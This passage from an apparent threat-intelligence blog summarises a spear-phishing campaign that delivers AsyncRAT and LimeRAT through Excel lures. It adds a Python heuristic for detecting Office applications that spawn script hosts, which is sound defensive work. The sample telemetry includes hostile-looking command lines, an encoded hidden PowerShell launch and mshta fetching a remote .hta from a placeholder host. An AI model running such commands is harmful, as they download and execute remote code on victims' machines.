An ongoing spear phishing campaign believed to have begun in 2021 has been identified by the Trellix research team, with the most recent attack occurring in March of 2022. The threat actors involved in the campaign are targeting government entities from Afghanistan, India, Italy, Poland, and the United States. Political subject lines are used to catch the potential victim’s attention, and within the email is a malicious attachment or URL. The attachment or URL, if clicked on, will open an Excel sheet that causes a Remote Access Trojan (RAT) to be installed on the victim’s machine. The two RATs observed in this campaign are AsyncRAT and LimeRAT; both maintain persistence and establish a connection with a Command and Control (C2) server. In an effort to exfiltrate data, both RATs perform malicious actions such as taking screenshots, capturing keystrokes, recording credentials/confidential information, and adding infected systems to botnets. Trellix researchers concluded that the spear phishing email originates from Southern Asia, and further hypothesized that the threat actors reside somewhere in that general area.
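The step in this chain that defenders can most readily catch on the endpoint is the Excel sheet handing off to a RAT installer. The following is an added example, not code from Trellix or Binary Defense, of a generic process-creation heuristic: an Office application spawning a scripting host or other living-off-the-land binary. The event format, field names, host names and paths are all constructed for this example; the report does not state which mechanism the Excel sheet uses, so the rule is a general Office-child heuristic rather than a signature for this campaign.

```python
"""Flag process-creation events where an Office application spawns a scripting host.

Added example (not from the Trellix report or Binary Defense). The event
schema below (host, parent_image, image, command_line) is constructed for
this demonstration; real telemetry such as Sysmon Event ID 1 would need a
small field-mapping step before being fed to scan_jsonl().
"""
import json
from pathlib import PureWindowsPath

# Office applications whose child processes are worth scrutinising.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}

# Script hosts / LOLBins that Office has little legitimate reason to launch.
SCRIPT_HOSTS = {
    "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe",
}


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path ('' if empty)."""
    return PureWindowsPath(path).name.lower()


def suspicious_office_children(events):
    """Return a list of findings for Office -> script-host process creations.

    Each event is a dict with parent_image, image, command_line and host.
    """
    findings = []
    for ev in events:
        parent = _basename(ev.get("parent_image", ""))
        child = _basename(ev.get("image", ""))
        if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
            findings.append({
                "host": ev.get("host", "unknown"),
                "parent": parent,
                "child": child,
                "command_line": ev.get("command_line", ""),
            })
    return findings


def scan_jsonl(lines):
    """Parse JSON-lines telemetry and run the heuristic over it."""
    events = (json.loads(line) for line in lines if line.strip())
    return suspicious_office_children(events)


# Constructed sample telemetry (hypothetical hosts and command lines).
SAMPLE_EVENTS = [
    '{"host": "ws-01", "parent_image": "C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\EXCEL.EXE", '
    '"image": "C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe", '
    '"command_line": "powershell.exe -nop -w hidden -enc AAAA"}',
    '{"host": "ws-01", "parent_image": "C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\EXCEL.EXE", '
    '"image": "C:\\\\Windows\\\\splwow64.exe", "command_line": "splwow64.exe 12288"}',
    '{"host": "ws-02", "parent_image": "C:\\\\Windows\\\\explorer.exe", '
    '"image": "C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe", '
    '"command_line": "powershell.exe"}',
    '{"host": "ws-03", "parent_image": "C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE", '
    '"image": "C:\\\\Windows\\\\System32\\\\mshta.exe", "command_line": "mshta.exe http://example.invalid/x.hta"}',
]


if __name__ == "__main__":
    for finding in scan_jsonl(SAMPLE_EVENTS):
        print(f"[{finding['host']}] {finding['parent']} -> {finding['child']}: {finding['command_line']}")
```

Of the four constructed events, two are flagged (Excel launching PowerShell, Word launching mshta); the print-spooler helper spawned by Excel and the PowerShell launched from Explorer are left alone, which is the point of keying on the parent/child pair rather than on either process by itself. In production this heuristic is a triage signal, not proof of compromise, and should be paired with the persistence and C2 indicators the campaign description mentions.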
Written by: Nataliia Zdrok, Threat Intelligence Analyst at Binary Defense

Russia’s invasion of Ukraine increased